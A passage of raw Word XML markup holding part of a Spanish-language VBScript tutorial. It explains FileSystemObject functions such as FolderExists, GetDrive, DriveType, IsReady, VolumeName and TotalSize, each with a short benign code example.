        <w:t xml:space="preserve">, por el contrarío es de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>solo lectura</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y devuelve la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ruta donde se encuentre archivo o carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en cuya estructura se realice. De esta forma, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>uniendo</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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ruta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> donde esta la carpeta y el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombre</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la misma, podemos obtener la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ruta completa</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la carpeta de sistema de Windows.</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décima función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FolderExists</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lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta función comprueba si una carpeta existe o no, devolviendo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 existe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si no existe. Esta función se suele usar para comprobar la existencia de una carpeta antes de borrarla (para no causar errores), etc. Su único argumento es la ruta de la carpeta de la que queremos comprobar su existencia. Es muy recomendable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>usarla siempre</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que no sepamos seguro si puede o no existi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1395"/>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1395"/>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FolderExists</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C:\Archivos de Programa\ScSWinter"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w: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reo que con este ejemplo queda bastante claro. Y esto es todo con las carpetas por ahora, y no es poco. Recomiendo de nuevo práctica para aprender esto. Si alguno se ha molestado en aprender de otras fuentes puede que vea mas funciones, o que se usan diferente; es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">normal puesto que esto es un tutorial para aprender lo más importante de Visual Basic Script, pero existen otras funciones que realizan lo mismo que estas, o que no tiene ninguna utilidad; así que, cuando estéis seguros de saber a la perfección todo lo que pone en estos tutoriales, no viene nunca mal mirar una referencia del lenguaje para verlo todo en conjunto y de forma ordenada (pero no explicada). Pero no me voy a ir más por las ramas, en el ultimo tutorial explicaré como hacer esto, por ahora continuemos con lo nuestro.  Las siguientes funciones necesitan el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.FileSystemObject.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Estas funciones se encargan de averiguar datos sobre </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>unidades de disco</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, bien sean Discos Duros, unidades de Red, CD-Rom's, disquetera... Todas estas funciones se basan en una especial que les indica a las demás la unidad elegida. Esta función es </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 xml:space="preserve"> A esta función solamente le tenemos que indicar le letra de la unidad con la que queremos operar según el siguiente ejemplo. A partir de ahí, la información sobre la unidad elegida se guarda en la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>uni</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en forma de estructura, esta vez de un disco, que es lo que usaremos en adelant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Drive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("C")</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la unidad no existe nos dará un error: "El dispositivo no esta listo.", que podemos evitar fácilmente con la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>On Error Resume Next</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no recomendado) o usando la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">DriveExists </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">junto con la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">sentencia If </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para verificar si existe de la siguiente forma (esta función devuelve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 existe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si n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If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DriveExists</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("C") The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Drive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("C")</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ejemplo muestra como se comprueba si existe la unidad C: y si existe, le aplica la función </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 xml:space="preserve"> De esta forma evitamos que produzca un error. A partir de aquí podemos usar las siguientes funciones para operar con las unidades que existen en nuestro PC:</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función útil para trabajar con unidades es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DriveType</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función da a variable un valor numérico según el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tipo de unidad</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de que se trate. Devuelve el valor 0 si es un tipo de unidad desconocida, 1 si es extraíble (disquetera, disco zip...), 2 si es fijo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(Disco Duro), 3 si es una unidad de red, 4 para los CD-rom y 5 para los discos RAM. De esa forma,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podremos no escribir en una unidad CD-Rom para que no de error, mostrar información sobre una unidad o saber si escribimos sobre la RAM, porque al apagar el ordenador esta memoria se borra (un disco Ram es raro encontrarlo, es lo que usan los LiveCD de Linux: usar la RAM como un Disco Duro).</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880"/>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1718"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fso</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C") variable = uni.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>DriveTyp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gund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IsReady</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función sirve para saber si la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">unidad esta lista </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para escribir en ella. Se suele utilizar en unidades de disco extraíble (disquetera) para saber si están llenas (es decir, si tienen un disquete dentro). Variable obtendrá el valor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 esta lista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si no lo esta (es de solo lectura). De esa forma podemos mandar a escribir en la disquetera si esta llena:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5916" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5916"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1708"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5916"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38" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="3028"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Drive</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("A") variable = uni.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">IsReady </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>If variable = True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qui va lo que quieras que pase si esta la disquetera llena) End If</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tercera</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> función para trabajar con unidades es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FileSystem</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función da a variable un valor que indica el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sistema de archivos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que esta utilizando la unidad. (Si no sabes lo que es, puedo decirte que de eso depende la capacidad de tu disco duro. Prueba a investigar en la red.) Normalmente los valores que devuelve son FAT para disquetes, FAT, FAT16, FAT32, FAT64 y NTFS para discos duros y CDFS para CD-Roms. Se utiliza de la siguiente forma:</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
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>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5055"/>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Drive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("C") variable = uni.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FileSystem</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cuarta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>VolumeName</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función da a variable un valor que indica el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombre</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que esta utilizando la unidad. Se utiliza </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>segun el ejemplo siguiente, que da a variable el nombre de la unidad C:</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880"/>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1718"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fso</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C") variable = uni.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>VolumeNam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ambién se puede usar para escribir un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nuevo nombre</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a una unidad. Esto se realiza colocando un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y después el nuevo nombre entre comillas. Hazlo como en el ejemplo siguiente, que le da el nombre de Nuevo a la unidad C, ya que es de lectura y escritura:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5362" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5740"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="880"/>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742"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fso</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C") uni.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">VolumeName </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>= "Nuevo"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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quinta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> función para trabajar con unidades es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TotalSize</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función da a variable un valor numérico que indica el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>espacio total</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que tiene la unidad en Bytes. Si queremos que nos lo de en Kbytes hay que dividirlo por 1024, si lo queremos en Mbytes hay que dividirlo dos veces por 1024, y si lo queremos en GBytes lo dividiremos un total de tres veces. Para quitarle los decimales podemos usar la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Fix</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se explica en </w:t>
      </w:r>
